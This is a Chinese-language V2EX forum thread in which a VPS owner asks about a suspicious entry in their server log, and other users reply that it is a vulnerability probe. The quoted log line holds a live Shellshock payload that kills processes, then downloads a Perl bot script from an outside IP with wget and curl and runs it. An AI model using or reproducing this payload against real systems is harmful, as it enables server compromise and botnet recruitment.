vps 被扫,懂 perl 的 v 友有空可以进来看下是什么意思吗?

2016-05-02 13:43:13 +08:00
 badcode
http://31.184.194.100/batman-vs-superman
日志里看到的,下载是 batman-vs-superman.pl
看到几个关键字,代理, DCC , DoS...

知道的朋友可以说下大概意思吗?
362 次点击
所在节点    VPS
4 条回复
msg7086
2016-05-02 20:56:44 +08:00
简单说,就是可以到进局子里蹲着的事情。
备份好数据赶紧重装就是啦。
badcode
2016-05-03 02:28:36 +08:00
@msg7086 别吓我呀
下面是其中一条日志,上面的链接就是我直接粘贴复制找到的
31.184.195.114 - - [30/Apr/2016:09:39:22 +0800] "GET /phppath/php4 HTTP/1.1" 403 162 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22crontab -r;killall -9 php perl; cd /tmp/ ; mkdir bat-mobile ; cd /tmp/bat-mobile ; wget http://31.184.194.100/batman-vs-superman ; perl batman-vs-superman ; lwp-download http://31.184.194.100/batman-vs-superman ; fetch http://31.184.194.100/batman-vs-superman ; curl -O http://31.184.194.100/batman-vs-superman ; perl batman-vs-superman;cd /tmp/;rm -rf bat*\x22);'"

结合上面的脚本和日志
能否说下我该怎么排查吗?

非常感谢!!!
msg7086
2016-05-03 04:41:11 +08:00
@badcode 这只是在试探漏洞而已。如果你打了补丁的话不会中招的。
badcode
2016-05-03 09:41:46 +08:00
好的,感谢回复

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/275792

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX